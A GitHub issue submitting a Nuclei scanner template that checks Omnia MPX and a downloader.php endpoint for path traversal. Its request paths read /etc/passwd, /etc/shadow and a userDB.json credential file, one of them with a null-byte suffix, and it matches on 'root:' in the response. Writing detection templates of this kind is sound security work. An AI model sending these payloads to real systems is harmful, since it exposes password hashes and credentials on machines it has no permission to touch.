### ISSUE TITLE
[nuclei-template] path_traversal

### ISSUE THREAD

**Issue by mr-vill4in** [projectdiscovery/nuclei-templates#5678]
### Template Information:
# path_traversal

### Nuclei Template:

```yaml
id: path_traversal
info:
  name: Omnia MPX - Path Traversal
  author: Mr_Vill4in
  severity: high
  description: Path Traversal via GET parameter
  reference:
    - https://www.exploit-db.com/exploits/50996
    - https://www.exploit-db.com/exploits/50950
  tags: path-traversal

requests:
  - method: GET
  - path:
    - "{{RootURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
    - "{{RootURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/shadow"
    - "{{RootURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
    - "{{RootURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "root:"
          - "admin"
          - "www-data"
        condition: or
  
```
